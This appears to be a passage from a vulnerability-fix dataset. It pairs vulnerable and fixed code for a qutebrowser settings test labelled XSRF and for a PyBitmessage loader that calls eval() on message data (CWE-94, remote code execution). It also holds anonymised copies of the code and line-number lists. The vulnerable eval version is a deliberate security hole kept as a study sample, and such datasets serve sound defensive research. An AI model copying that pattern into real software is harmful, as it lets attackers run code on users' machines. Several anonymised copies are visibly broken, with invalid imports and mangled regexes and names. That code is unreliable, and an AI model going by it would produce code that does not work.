args = (['--temp-basedir'] + _base_args(request.config))
quteproc_new.start(args, env=env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
quteproc_new.set_setting('downloads.location.directory', str(download_dir))
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(category='downloads', message='Download * finished')
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(message='Entering mode KeyMode.yesno *')
quteproc_new.send_cmd(':prompt-accept yes')
quteproc_new.wait_for(category='downloads', message='Download * finished')
files = download_dir.listdir()
assert len(files) == 1
assert files[0].basename == 'download.bin'
def test_command_on_start(request, quteproc_new):
"""Make sure passing a command on start works.
See https://github.com/qutebrowser/qutebrowser/issues/2408
"""
args = (['--temp-basedir'] + _base_args(request.config) +
[':quickmark-add https://www.example.com/ example'])
quteproc_new.start(args)
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_launching_with_python2():
try:
proc = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], stderr=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert proc.returncode == 1
error = "At least Python 3.5 is required to run qutebrowser"
assert proc.stderr.decode('ascii').startswith(error)
def test_initial_private_browsing(request, quteproc_new):
"""Make sure the initial window is private when the setting is set."""
args = (_base_args(request.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- private: True
tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_loading_empty_session(tmpdir, request, quteproc_new):
"""Make sure loading an empty session opens a window."""
session = tmpdir / 'session.yml'
session.write('windows: []')
args = _base_args(request.config) + ['--temp-basedir', '-r', str(session)]
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_qute_settings_persistence(short_tmpdir, request, quteproc_new):
"""Make sure settings from qute://settings are persistent."""
args = _base_args(request.config) + ['--basedir', str(short_tmpdir)]
quteproc_new.start(args)
quteproc_new.open_path('qute://settings/')
quteproc_new.send_cmd(':jseval --world main '
'cset("search.ignore_case", "always")')
assert quteproc_new.get_setting('search.ignore_case') == 'always'
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
quteproc_new.start(args)
assert quteproc_new.get_setting('search.ignore_case') == 'always'
| xsrf | {
"code": [
" quteproc_new.open_path(",
" 'qute://settings/set?option=search.ignore_case&value=always')"
],
"line_no": [
371,
372
]
} | {
"code": [
" quteproc_new.open_path('qute://settings/')",
" quteproc_new.send_cmd(':jseval --world main '",
" 'cset(\"search.ignore_case\", \"always\")')"
],
"line_no": [
371,
372,
373
]
} |
import .subprocess
import .socket
import .sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
VAR_0 = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def FUNC_0(VAR_1):
VAR_11 = ['--debug', '--json-logging', '--no-err-windows']
if VAR_1.webengine:
VAR_11 += ['--backend', 'webengine']
else:
VAR_11 += ['--backend', 'webkit']
if qVersion() == '5.7.1':
VAR_11 += ['--qt-flag', 'disable-seccomp-filter-sandbox']
VAR_11.append('about:blank')
return VAR_11
@pytest.fixture
def VAR_8(VAR_2, VAR_3):
VAR_12 = VAR_2 / 'data'
VAR_13 = VAR_2 / 'config'
VAR_14 = VAR_3 / 'rt'
VAR_15 = VAR_2 / 'cache'
VAR_14.ensure(dir=True)
VAR_14.chmod(0o700)
(VAR_12 / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
VAR_16 = {
'XDG_DATA_HOME': str(VAR_12),
'XDG_CONFIG_HOME': str(VAR_13),
'XDG_RUNTIME_DIR': str(VAR_14),
'XDG_CACHE_HOME': str(VAR_15),
}
return VAR_16
@pytest.mark.linux
@VAR_0
def FUNC_2(VAR_4, VAR_5, VAR_2, VAR_6):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('downloads.location.directory', str(VAR_2))
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/ä-issue908.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
VAR_6.set_setting('downloads.location.prompt', 'true')
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
VAR_6.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
VAR_6.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(VAR_2.listdir()) == 1
assert (VAR_2 / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@VAR_0
def FUNC_3(VAR_4, VAR_5, VAR_2, VAR_6, VAR_7):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('url.auto_search', 'never')
VAR_6.send_cmd(':open {}'.format(VAR_7))
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@VAR_0
def FUNC_4(VAR_4, VAR_5, VAR_2,
VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
['/VAR_17/user/föö.html'])
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'}, wait_focus=False)
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def FUNC_5(VAR_4, VAR_5, VAR_8,
VAR_2, VAR_6):
VAR_17 = VAR_2 / 'home'
VAR_17.ensure(dir=True)
VAR_8['HOME'] = str(VAR_17)
assert VAR_8['XDG_CONFIG_HOME'] == VAR_2 / 'config'
(VAR_2 / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
VAR_6.start(FUNC_0(VAR_4.config), VAR_16=VAR_8)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/download.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_18 = VAR_6.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
VAR_18.expected = True
VAR_6.wait_for(category='downloads',
message='Download download.bin finished')
assert (VAR_17 / 'download.bin').exists()
def FUNC_6(VAR_4, VAR_6):
VAR_6.start(VAR_11=['--temp-basedir', '--loglines=0'] +
FUNC_0(VAR_4.config))
VAR_6.open_path('qute://log')
assert VAR_6.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def FUNC_7(VAR_4, VAR_6, VAR_9, VAR_10):
VAR_6.start(VAR_11=['--temp-basedir'] + FUNC_0(VAR_4.config),
VAR_16={'PYTHONOPTIMIZE': VAR_10})
if VAR_10 == '2':
VAR_23 = ("Running on optimize VAR_10 higher than 1, unexpected behavior "
"may occur.")
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def FUNC_8(VAR_4):
VAR_11 = ['-m', 'qutebrowser', '--version'] + FUNC_0(VAR_4.config)
VAR_19 = QProcess()
VAR_19.setProcessChannelMode(QProcess.SeparateChannels)
VAR_19.start(sys.executable, VAR_11)
VAR_20 = VAR_19.waitForStarted(2000)
assert VAR_20
ok = VAR_19.waitForFinished(10000)
VAR_21 = bytes(VAR_19.readAllStandardOutput()).decode('utf-8')
print(VAR_21)
VAR_22 = bytes(VAR_19.readAllStandardError()).decode('utf-8')
print(VAR_22)
assert VAR_20
assert VAR_19.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\VAR_25+v\d+(\.\d+)', VAR_21) is not None
def FUNC_9(VAR_4, VAR_6, VAR_2):
VAR_11 = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(VAR_2 / 'does-not-exist')] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_23 = 'QCss::Parser - Failed to load file "*does-not-exist"'
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@utils.skip_qt511
def FUNC_10(VAR_4, VAR_6):
if not VAR_4.config.webengine:
pytest.skip()
VAR_11 = (['--temp-basedir', '--enable-webengine-inspector'] +
FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_18 = VAR_6.wait_for(
message='Remote debugging VAR_5 started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
VAR_24 = int(VAR_18.message.split(':')[-1])
VAR_25 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
VAR_25.connect(('127.0.0.1', VAR_24))
VAR_25.close()
@pytest.mark.linux
def FUNC_11(VAR_4, VAR_6, VAR_2):
if not VAR_4.config.webengine:
pytest.skip()
VAR_26 = VAR_2 / 'downloads'
VAR_26.ensure(dir=True)
(VAR_2 / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(VAR_26))
VAR_16 = {'XDG_CONFIG_HOME': str(VAR_2)}
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11, VAR_16=env)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_6.set_setting('downloads.location.directory', str(VAR_26))
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(message='Entering mode KeyMode.yesno *')
VAR_6.send_cmd(':prompt-accept yes')
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_27 = VAR_26.listdir()
assert len(VAR_27) == 1
assert VAR_27[0].basename == 'download.bin'
def FUNC_12(VAR_4, VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
[':quickmark-add https://www.example.com/ example'])
VAR_6.start(VAR_11)
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_13():
try:
VAR_19 = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], VAR_22=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert VAR_19.returncode == 1
VAR_28 = "At least Python 3.5 is required to run qutebrowser"
assert VAR_19.stderr.decode('ascii').startswith(VAR_28)
def FUNC_14(VAR_4, VAR_6):
VAR_11 = (FUNC_0(VAR_4.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- private: True
tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_15(VAR_2, VAR_4, VAR_6):
VAR_29 = VAR_2 / 'session.yml'
VAR_29.write('windows: []')
VAR_11 = FUNC_0(VAR_4.config) + ['--temp-basedir', '-r', str(VAR_29)]
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_16(VAR_3, VAR_4, VAR_6):
VAR_11 = FUNC_0(VAR_4.config) + ['--basedir', str(VAR_3)]
VAR_6.start(VAR_11)
VAR_6.open_path(
'qute://settings/set?option=search.ignore_case&value=always')
assert VAR_6.get_setting('search.ignore_case') == 'always'
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
VAR_6.start(VAR_11)
assert VAR_6.get_setting('search.ignore_case') == 'always'
|
import .subprocess
import .socket
import .sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
VAR_0 = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def FUNC_0(VAR_1):
VAR_11 = ['--debug', '--json-logging', '--no-err-windows']
if VAR_1.webengine:
VAR_11 += ['--backend', 'webengine']
else:
VAR_11 += ['--backend', 'webkit']
if qVersion() == '5.7.1':
VAR_11 += ['--qt-flag', 'disable-seccomp-filter-sandbox']
VAR_11.append('about:blank')
return VAR_11
@pytest.fixture
def VAR_8(VAR_2, VAR_3):
VAR_12 = VAR_2 / 'data'
VAR_13 = VAR_2 / 'config'
VAR_14 = VAR_3 / 'rt'
VAR_15 = VAR_2 / 'cache'
VAR_14.ensure(dir=True)
VAR_14.chmod(0o700)
(VAR_12 / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
VAR_16 = {
'XDG_DATA_HOME': str(VAR_12),
'XDG_CONFIG_HOME': str(VAR_13),
'XDG_RUNTIME_DIR': str(VAR_14),
'XDG_CACHE_HOME': str(VAR_15),
}
return VAR_16
@pytest.mark.linux
@VAR_0
def FUNC_2(VAR_4, VAR_5, VAR_2, VAR_6):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('downloads.location.directory', str(VAR_2))
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/ä-issue908.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
VAR_6.set_setting('downloads.location.prompt', 'true')
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
VAR_6.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
VAR_6.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(VAR_2.listdir()) == 1
assert (VAR_2 / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@VAR_0
def FUNC_3(VAR_4, VAR_5, VAR_2, VAR_6, VAR_7):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('url.auto_search', 'never')
VAR_6.send_cmd(':open {}'.format(VAR_7))
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@VAR_0
def FUNC_4(VAR_4, VAR_5, VAR_2,
VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
['/VAR_17/user/föö.html'])
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'}, wait_focus=False)
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def FUNC_5(VAR_4, VAR_5, VAR_8,
VAR_2, VAR_6):
VAR_17 = VAR_2 / 'home'
VAR_17.ensure(dir=True)
VAR_8['HOME'] = str(VAR_17)
assert VAR_8['XDG_CONFIG_HOME'] == VAR_2 / 'config'
(VAR_2 / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
VAR_6.start(FUNC_0(VAR_4.config), VAR_16=VAR_8)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/download.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_18 = VAR_6.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
VAR_18.expected = True
VAR_6.wait_for(category='downloads',
message='Download download.bin finished')
assert (VAR_17 / 'download.bin').exists()
def FUNC_6(VAR_4, VAR_6):
VAR_6.start(VAR_11=['--temp-basedir', '--loglines=0'] +
FUNC_0(VAR_4.config))
VAR_6.open_path('qute://log')
assert VAR_6.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def FUNC_7(VAR_4, VAR_6, VAR_9, VAR_10):
VAR_6.start(VAR_11=['--temp-basedir'] + FUNC_0(VAR_4.config),
VAR_16={'PYTHONOPTIMIZE': VAR_10})
if VAR_10 == '2':
VAR_23 = ("Running on optimize VAR_10 higher than 1, unexpected behavior "
"may occur.")
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def FUNC_8(VAR_4):
VAR_11 = ['-m', 'qutebrowser', '--version'] + FUNC_0(VAR_4.config)
VAR_19 = QProcess()
VAR_19.setProcessChannelMode(QProcess.SeparateChannels)
VAR_19.start(sys.executable, VAR_11)
VAR_20 = VAR_19.waitForStarted(2000)
assert VAR_20
ok = VAR_19.waitForFinished(10000)
VAR_21 = bytes(VAR_19.readAllStandardOutput()).decode('utf-8')
print(VAR_21)
VAR_22 = bytes(VAR_19.readAllStandardError()).decode('utf-8')
print(VAR_22)
assert VAR_20
assert VAR_19.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\VAR_25+v\d+(\.\d+)', VAR_21) is not None
def FUNC_9(VAR_4, VAR_6, VAR_2):
VAR_11 = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(VAR_2 / 'does-not-exist')] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_23 = 'QCss::Parser - Failed to load file "*does-not-exist"'
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@utils.skip_qt511
def FUNC_10(VAR_4, VAR_6):
if not VAR_4.config.webengine:
pytest.skip()
VAR_11 = (['--temp-basedir', '--enable-webengine-inspector'] +
FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_18 = VAR_6.wait_for(
message='Remote debugging VAR_5 started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
VAR_24 = int(VAR_18.message.split(':')[-1])
VAR_25 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
VAR_25.connect(('127.0.0.1', VAR_24))
VAR_25.close()
@pytest.mark.linux
def FUNC_11(VAR_4, VAR_6, VAR_2):
if not VAR_4.config.webengine:
pytest.skip()
VAR_26 = VAR_2 / 'downloads'
VAR_26.ensure(dir=True)
(VAR_2 / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(VAR_26))
VAR_16 = {'XDG_CONFIG_HOME': str(VAR_2)}
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11, VAR_16=env)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_6.set_setting('downloads.location.directory', str(VAR_26))
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(message='Entering mode KeyMode.yesno *')
VAR_6.send_cmd(':prompt-accept yes')
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_27 = VAR_26.listdir()
assert len(VAR_27) == 1
assert VAR_27[0].basename == 'download.bin'
def FUNC_12(VAR_4, VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
[':quickmark-add https://www.example.com/ example'])
VAR_6.start(VAR_11)
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_13():
try:
VAR_19 = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], VAR_22=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert VAR_19.returncode == 1
VAR_28 = "At least Python 3.5 is required to run qutebrowser"
assert VAR_19.stderr.decode('ascii').startswith(VAR_28)
def FUNC_14(VAR_4, VAR_6):
VAR_11 = (FUNC_0(VAR_4.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- private: True
tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_15(VAR_2, VAR_4, VAR_6):
VAR_29 = VAR_2 / 'session.yml'
VAR_29.write('windows: []')
VAR_11 = FUNC_0(VAR_4.config) + ['--temp-basedir', '-r', str(VAR_29)]
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_16(VAR_3, VAR_4, VAR_6):
VAR_11 = FUNC_0(VAR_4.config) + ['--basedir', str(VAR_3)]
VAR_6.start(VAR_11)
VAR_6.open_path('qute://settings/')
VAR_6.send_cmd(':jseval --world main '
'cset("search.ignore_case", "always")')
assert VAR_6.get_setting('search.ignore_case') == 'always'
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
VAR_6.start(VAR_11)
assert VAR_6.get_setting('search.ignore_case') == 'always'
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
27,
30,
32,
33,
37,
38,
47,
51,
52,
56,
64,
67,
71,
79,
80,
85,
92,
93,
100,
101,
110,
113,
114,
120,
126,
127,
128,
130,
135,
138,
139,
145,
148,
149,
153,
158,
161,
162,
167,
174,
178,
180,
193,
195,
196,
203,
204,
215,
216,
219,
220,
226,
227,
230,
235,
240,
243,
245,
246,
252,
256,
259,
260,
272,
276,
277,
283,
286,
292,
301,
305,
306,
309,
317,
318,
328,
329,
335,
343,
346,
347,
352,
355,
362,
365,
366,
374,
377,
380,
20,
40,
55,
56,
57,
58,
59,
84,
85,
86,
87,
88,
119,
120,
121,
122,
144,
145,
146,
147,
166,
167,
168,
169,
170,
198,
224,
248,
280,
308,
309,
310,
311,
331,
349,
368
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
27,
30,
32,
33,
37,
38,
47,
51,
52,
56,
64,
67,
71,
79,
80,
85,
92,
93,
100,
101,
110,
113,
114,
120,
126,
127,
128,
130,
135,
138,
139,
145,
148,
149,
153,
158,
161,
162,
167,
174,
178,
180,
193,
195,
196,
203,
204,
215,
216,
219,
220,
226,
227,
230,
235,
240,
243,
245,
246,
252,
256,
259,
260,
272,
276,
277,
283,
286,
292,
301,
305,
306,
309,
317,
318,
328,
329,
335,
343,
346,
347,
352,
355,
362,
365,
366,
374,
376,
379,
382,
20,
40,
55,
56,
57,
58,
59,
84,
85,
86,
87,
88,
119,
120,
121,
122,
144,
145,
146,
147,
166,
167,
168,
169,
170,
198,
224,
248,
280,
308,
309,
310,
311,
331,
349,
368
] |
5CWE-94
| from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class MsgBase(object):
def encode(self):
self.data = {"": lower(type(self).__name__)}
def constructObject(data):
try:
classBase = eval(data[""] + "." + data[""].title())
except NameError:
logger.error("Don't know how to handle message type: \"%s\"", data[""])
return None
try:
returnObj = classBase()
returnObj.decode(data)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return returnObj
if paths.frozen is not None:
import messagetypes.message
import messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
splitted = path.splitext(mod)
if splitted[1] != ".py":
continue
try:
import_module("." + splitted[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class MsgBase(object):
def encode(self):
self.data = {"": lower(type(self).__name__)}
def constructObject(data):
try:
m = import_module("messagetypes." + data[""])
classBase = getattr(m, data[""].title())
except (NameError, ImportError):
logger.error("Don't know how to handle message type: \"%s\"", data[""], exc_info=True)
return None
try:
returnObj = classBase()
returnObj.decode(data)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return returnObj
if paths.frozen is not None:
import messagetypes.message
import messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
splitted = path.splitext(mod)
if splitted[1] != ".py":
continue
try:
import_module("." + splitted[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| remote_code_execution | {
"code": [
" classBase = eval(data[\"\"] + \".\" + data[\"\"].title())",
" except NameError:",
" logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"])"
],
"line_no": [
15,
16,
17
]
} | {
"code": [
" m = import_module(\"messagetypes.\" + data[\"\"])",
" classBase = getattr(m, data[\"\"].title())",
" except (NameError, ImportError):",
" logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"], exc_info=True)"
],
"line_no": [
15,
16,
17,
18
]
} | from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class CLASS_0(object):
def FUNC_1(self):
self.data = {"": lower(type(self).__name__)}
def FUNC_0(VAR_0):
try:
VAR_1 = eval(VAR_0[""] + "." + VAR_0[""].title())
except NameError:
logger.error("Don't know how to handle message type: \"%s\"", VAR_0[""])
return None
try:
VAR_2 = VAR_1()
VAR_2.decode(VAR_0)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return VAR_2
if paths.frozen is not None:
import messagetypes.message
import messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
VAR_3 = path.splitext(mod)
if VAR_3[1] != ".py":
continue
try:
import_module("." + VAR_3[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class CLASS_0(object):
def FUNC_1(self):
self.data = {"": lower(type(self).__name__)}
def FUNC_0(VAR_0):
try:
VAR_1 = import_module("messagetypes." + VAR_0[""])
VAR_2 = getattr(VAR_1, VAR_0[""].title())
except (NameError, ImportError):
logger.error("Don't know how to handle message type: \"%s\"", VAR_0[""], exc_info=True)
return None
try:
VAR_3 = VAR_2()
VAR_3.decode(VAR_0)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return VAR_3
if paths.frozen is not None:
import .messagetypes.message
import .messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
VAR_4 = path.splitext(mod)
if VAR_4[1] != ".py":
continue
try:
import_module("." + VAR_4[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| [
4,
7,
11,
12,
30,
47
] | [
4,
7,
11,
12,
31,
48
] |
5CWE-94
| import pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError
MODULE_NAME = "openapi_python_client.parser.properties"
class TestProperty:
def test_get_type_string(self):
from openapi_python_client.parser.properties import Property
p = Property(name="test", required=True, default=None)
p._type_string = "TestType"
assert p.get_type_string() == "TestType"
p.required = False
assert p.get_type_string() == "Optional[TestType]"
def test_to_string(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
get_type_string = mocker.patch.object(p, "get_type_string")
assert p.to_string() == f"{snake_case(name)}: {get_type_string()}"
p.required = False
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = None"
p.default = "TEST"
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = TEST"
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
assert p.get_imports(prefix="") == set()
p.required = False
assert p.get_imports(prefix="") == {"from typing import Optional"}
class TestStringProperty:
def test___post_init__(self):
from openapi_python_client.parser.properties import StringProperty
sp = StringProperty(name="test", required=True, default="A Default Value",)
assert sp.default == '"A Default Value"'
def test_get_type_string(self):
from openapi_python_client.parser.properties import StringProperty
p = StringProperty(name="test", required=True, default=None)
assert p.get_type_string() == "str"
p.required = False
assert p.get_type_string() == "Optional[str]"
class TestDateTimeProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateTimeProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateTimeProperty(name=name, required=True, default=None)
